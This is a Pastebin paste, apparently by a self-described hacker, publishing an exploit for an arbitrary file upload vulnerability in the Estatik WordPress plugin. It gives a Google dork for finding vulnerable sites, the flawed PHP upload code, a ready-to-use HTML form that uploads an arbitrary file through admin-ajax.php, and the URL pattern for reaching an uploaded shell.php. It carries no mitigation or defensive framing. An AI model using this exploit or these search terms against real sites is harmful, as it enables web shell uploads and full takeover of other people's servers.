Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <!--
- \ \ / (_)_ __ _ _ ___\ \/ / _ \ ____
- \ \ / /| | '__| | | / __|\ /| | | |_ /
- \ V / | | | | |_| \__ \/ \| |_| |/ /
- \_/ |_|_| \__,_|___/_/\_\____//___|
- -->
- #########################################################
- #Exploit Title: Arbitrary File Upload Vulnerability in Estatik
- #Category: webapps
- #Google Dork : inurl:/wp-content/plugins/estatik/
- : index of "/wp-content/plugins/estatik/"
- #########################################################
- [+] In that function the following code saves an uploaded file sent with a request to the AJAX function:
- $image_name = time()."_".$_FILES['es_media_images']['name'][$i];
- $sourcePath = $_FILES['es_media_images']['tmp_name'][$i];
- $targetPath = $upload_dir['path']."/".$image_name;
- move_uploaded_file($sourcePath,$targetPath) ;
- [+] Proof of Concept:
- The following proof of concept will upload the selected file and put it in the current
- month’s directory inside of the /wp-content/uploads/ directory.
- The name of the file in the upload directory with be the time the file
- was saved as output by the function time() followed by a “_”
- and then name of the as it was uploaded.
- Make sure to replace “[path to WordPress]” with the location of WordPress.
- <html>
- <body>
- <form action="http://[path to WordPress]/wp-admin/admin-ajax.php" method="POST" enctype="multipart/form-data">
- <input type="hidden" name="action" value="es_prop_media_images" />
- <input type="file" name="es_media_images[]" />
- <input type="submit" value="Submit" />
- </form>
- </body>
- </html>
- [+]shell access:
- http://www.Target.com/wp-content/uploads/time/shell.php
- Video
- https://youtu.be/G80_JRsuY88
- Bye..
- Algerien Hacker
Add Comment
Please, Sign In to add comment